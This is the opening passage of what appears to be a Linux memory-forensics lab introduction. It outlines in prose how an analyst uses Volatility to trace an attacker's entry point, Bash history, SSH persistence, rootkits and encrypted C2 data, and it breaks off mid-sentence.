In this forensic investigation, we will analyze a compromised Linux system by examining its memory dump using Volatility, a powerful memory forensics framework. As a security analyst, your task is to uncover the details of an attack, including the attacker’s entry point, persistence mechanisms, and any hidden backdoors they have left behind. Memory forensics is a crucial technique in incident response, allowing analysts to retrieve volatile data such as running processes, network connections, and system modifications that may not be present in traditional disk-based analysis. The investigation begins with identifying system details, such as the Linux distribution and kernel version, to ensure compatibility with forensic tools. By extracting Bash history, we can reconstruct command executions, revealing the attacker’s activities and potential payloads they deployed. Advanced attackers often attempt to erase traces of their presence, but by analyzing process hierarchies, we can detect anomalies such as unauthorized scripts, rogue network connections, or unexpected privilege escalation attempts.
As we dive deeper, we will uncover how the attacker established persistence, possibly using SSH-based methods or other file modifications. Kernel-level threats, such as rootkits, may be deployed to manipulate system behavior and evade detection. By inspecting system calls and kernel modules, we can detect any malicious alterations that could indicate a sophisticated compromise. Additionally, we will analyze encrypted data used by the attacker to conceal critical information, such as backdoor credentials or command-and-control (C2) communication. This lab will challenge your forensic analysis skills by requiring you to piece togeth